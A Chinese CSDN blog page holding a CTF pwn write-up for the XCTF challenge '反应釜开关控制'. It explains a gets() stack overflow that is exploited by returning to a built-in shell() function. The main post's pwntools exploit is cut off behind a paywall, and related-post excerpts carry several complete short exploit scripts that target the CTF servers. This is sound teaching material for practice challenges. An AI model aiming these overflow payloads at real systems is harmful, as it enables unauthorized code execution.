反应釜开关控制(xctf)

最新推荐文章于 2023-06-03 10:36:20 发布
最新推荐文章于 2023-06-03 10:36:20 发布
阅读量747 收藏
点赞数
分类专栏: # xctf(pwn高手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/106317144
版权
本文详细介绍了程序保护和流程,重点分析了一个存在栈溢出的main()函数,发现可以覆盖return地址来调用shell()函数。通过构造特定的payload,0x208个'a'字符加上0x4005F6的地址,实现了利用过程。
摘要由CSDN通过智能技术生成

0x0 程序保护和流程

保护:

在这里插入图片描述

流程:

main()

在这里插入图片描述

gets明显存在栈溢出。又在函数列表中找到了shell()函数。

在这里插入图片描述

0x1 利用过程

直接覆盖return的地址payload=0x208*‘a’+p64(0x4005F6)

exp

from pwn import *
#sh=process('./a')
sh=remote('124.126.19.106'
最低0.47元/天 解锁文章
whiteh4nd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
1.反应釜开关控制
weixin_44864859的博客
07-27 376
1.反应釜开关控制 拿到这道题,ida分析之后感觉是有些奇怪的,因为题目就是简单的栈溢出,而且给了后门函数。所以就是简单的ret2text。 exp: from pwn import * context(log_level='debug',arch='amd64',os='linux') r = remote('220.249.52.133',37791) elf = ELF('./kaiguan') shell_addr = 0x04005F6 payload = 'A'*0x208 + p64(she
非预期解 |攻防世界 pwn进阶 反应釜开关控制
Kni9hT's Blog
04-20 1000
文章目录菜鸡独白0x00.看题0x01.查看保护0x02.懵...非预期0x03.后记 菜鸡独白 好久没做题了,看大佬们天天在朋友圈晒比赛成绩,不由感叹WTCL! 今天下午无聊继续刷起ADworld。 0x00.看题 题目描述:小M在里一个私人矿厂中发现了一条TNT生产线中硝化反应釜的接口,反应釜是一种反应设备,非常的不稳定,会因为很多原因造成损坏,导致生产被迫停止。她怀疑这个工厂可能进行地下军火...
[XCTF-pwn] 3-反应釜开关控制
weixin_52640415的博客
03-03 152
溢出到后门 from pwn import * p = remote('111.200.241.244', 53046) p.sendline(flat(b'A'*(0x200+8), 0x4005f6)) p.interactive()
xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“
njh18790816639的博客
07-31 339
反应釜开关控制 该pwn题目逻辑较为简单。 通过三次栈溢出,可以得到shell函数地址。 发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂! 这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。 分界线 这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。 实时数据监测 发现什么保护都没有
[攻防世界]反应釜开关控制
逆向萌新的博客
06-21 435
[攻防世界]反应釜开关控制
[攻防世界 pwn]——反应釜开关控制
Y_peak的博客
02-23 357
[攻防世界 pwn]——反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit from pwn import * p = remote("111.200.241.244",31931) payload='a' * (0x200 + 8)+p64(0x4005F6) p.sendlineafter('>',payload) p.interactive() ...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
攻防世界 Pwn 反应釜开关控制
MrTreebook的博客
12-12 425
攻防世界 Pwn 反应釜开关控制1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 只开启了NX,并且是64位程序 3.IDA分析 看到一个gets函数,并且没有边界限制 存在溢出可以利用 再往下看其他的函数 虽然题目给了很多函数,但是没开canary,没开PIE 没有什么难度,直接ret到后门函数即可 .text:00000000004005F6 public shell .text:0000000000
攻防世界高手进阶区 ——反应釜开关控制
weixin_62675330的博客
02-11 484
攻防世界高手进阶区 ——反应釜开关控制 题目没什么信息。在这里插入图片描述 1.分析文件 运行一下,可能为栈溢出的题。 checkse 无栈溢出保护,无地址随机化,只有堆栈不可执行。 栈溢出可能性大。 ida64 int __cdecl main(int argc, const char **argv, const char **envp) { char s[64]; // [rsp+0h] [rbp-240h] BYREF char v5[512]; // [rsp+40h] [
攻防世界 pwn——反应釜开关控制
CNS-Enterprise BCC-1701-J
06-03 327
攻防世界 做题练习
攻防世界:PWN刷题-反应釜开关控制
m0_53932372的博客
12-30 2019
反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote(“111.200.241.244”,52515) payload=b’a’*512+b’b’*8+p64(0x00004005F6) p.sendline(payload) p.interactive() ...
[XCTF-pwn] 37_xctf-4th-CyberEarth_play
weixin_52640415的博客
03-10 252
又买一个,实在是代码太我看不明白了。 解题思路: 用同一个用户登录两次,选择不同的攻击方式,直到成功。 成功后,输入名字的地方有溢出,在这里写入rop:泄露,修改got.puts为system,再调用puts(/bin/sh) 验证后的exp: from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pw...
攻防世界 web get_post
Kni9hT's Blog
02-29 1072
需要用到插件:Max hackbar 浏览器:火狐浏览器 题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗? http的两种请求分别是get和post(看题目就知道) get和post区别 GET在浏览器回退时是无害的,而POST会再次提交请求。 GET产生的URL地址可以被Bookmark,而POST不可以。 GET请求会被浏览器主动cache,而POST不...
攻防世界-PWN-Challenge-Wirteup
07-29 824
目录 dice_game 反应釜开关控制 dice_game 这个提跟新手区一个题很像,都是利用溢出覆盖随机数的种子,使得随机数产生的序列固定,在本地产生序列后脚本提交就可以了 ida查看程序 栈信息: 将seed覆盖为全0,使用c在kali中跑一下: #include <stdlib.h> #include <stdio.h> int main() { srand(0); for(int i = 0; i < 50; i++) { i.
64位程序rop链构造|攻防世界pwn进阶区 pwn-100
Kni9hT's Blog
03-16 4037
文章目录前言利用思路0x01.ida调试发现sub_40063D函数可以溢出0x02.cyclic计算溢出需要填充72字节0x03.checksec看一下保护0x04.利用思路:0x05.可以用vmmap查找binary文件地址0x06.用 `ROPgadget --binary pwn100 --only "pop|ret" | grep rdi`命令寻找ROP0x07.32位程序和64位程序...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值